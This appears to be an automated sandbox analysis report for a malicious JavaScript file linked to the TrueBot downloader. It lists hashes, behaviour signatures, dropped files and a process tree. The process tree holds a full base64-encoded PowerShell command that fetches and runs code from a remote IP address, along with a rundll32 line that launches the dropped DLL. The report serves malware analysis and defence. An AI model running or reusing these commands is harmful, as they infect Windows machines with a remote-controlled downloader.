Analysis

  • max time kernel
    1588s
  • max time network
    1789s
  • platform
    windows10-1703_x64
  • resource
    win10-20230220-en
  • resource tags

    arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
  • submitted
    07-04-2023 16:06

General

  • Target

    information_7_apr-4753978.js

  • Size

    67KB

  • MD5

    71e7a2549311647a6178b84393700bf8

  • SHA1

    5d605717cc5ff74f0b993274790ec343fe2c2687

  • SHA256

    8a2aa35f1e8e8186a0f4a6684d3cab54e093914b2dba38f59d5d01c6ee6aaf04

  • SHA512

    1ec12ae9f544de092e14daf118be87d64498bd0c3590281f1e44bc98809f89c0a4b60c172fd9ad19503a8cd466f0361f5336d140a25ea21f5747142745ccbd4a

  • SSDEEP

    1536:EMtPc6S1wxBOGKZUXldvp3yZEKs7+QhqWIoCqlO1wKF7x1tNRhn4xVNe/6BPfGMd:i1wxBOGKZUXldvp3yZEKs7+QhqWIoCqZ

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.69/dll.png

Signatures

  • TrueBot payload 2 IoCs
  • TrueBot, Silence.Downloader

    A downloader attributed to Silence group first seen in 2017.

  • Blocklisted process makes network request 6 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\information_7_apr-4753978.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2524
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4ANgA5AC8AZABsAGwALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2640
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4ANgA5AC8AZABsAGwALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3132
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c rundll32 %APPDATA%\NoSleep.dll,ChkdskExs
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4744
          • C:\Windows\system32\rundll32.exe
            rundll32 C:\Users\Admin\AppData\Roaming\NoSleep.dll,ChkdskExs
            5⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1076

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mckkyg4k.2hi.ps1

    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • C:\Users\Admin\AppData\Roaming\NoSleep.dll

    Filesize

    1.1MB

    MD5

    f52363b6cf282669e5fcc5537b5c3451

    SHA1

    9d9a0b90042fce790ab23191be9cce44c86f13d9

    SHA256

    b803db527f146f0d356700e24836a2e888f74c3dd2196a99f73caa0e57007f34

    SHA512

    d129f4f67691d9042e0bd0d94fabdecf96cadc33d15a662d1910bbb6bbf807eb73cc907f9268aaf99c7680a34d4088b3e79da8cff2dda7f12bc1ba95b44b6b49

  • \Users\Admin\AppData\Roaming\NoSleep.dll

    Filesize

    1.1MB

    MD5

    f52363b6cf282669e5fcc5537b5c3451

    SHA1

    9d9a0b90042fce790ab23191be9cce44c86f13d9

    SHA256

    b803db527f146f0d356700e24836a2e888f74c3dd2196a99f73caa0e57007f34

    SHA512

    d129f4f67691d9042e0bd0d94fabdecf96cadc33d15a662d1910bbb6bbf807eb73cc907f9268aaf99c7680a34d4088b3e79da8cff2dda7f12bc1ba95b44b6b49

  • memory/3132-124-0x00000214B9170000-0x00000214B9180000-memory.dmp

    Filesize

    64KB

  • memory/3132-127-0x00000214B9100000-0x00000214B9122000-memory.dmp

    Filesize

    136KB

  • memory/3132-130-0x00000214B9C90000-0x00000214B9D06000-memory.dmp

    Filesize

    472KB

  • memory/3132-146-0x00000214B9170000-0x00000214B9180000-memory.dmp

    Filesize

    64KB

  • memory/3132-147-0x00000214B9170000-0x00000214B9180000-memory.dmp

    Filesize

    64KB

  • memory/3132-149-0x00000214B9170000-0x00000214B9180000-memory.dmp

    Filesize

    64KB

  • memory/3132-150-0x00000214B9170000-0x00000214B9180000-memory.dmp

    Filesize

    64KB

  • memory/3132-151-0x00000214B9170000-0x00000214B9180000-memory.dmp

    Filesize

    64KB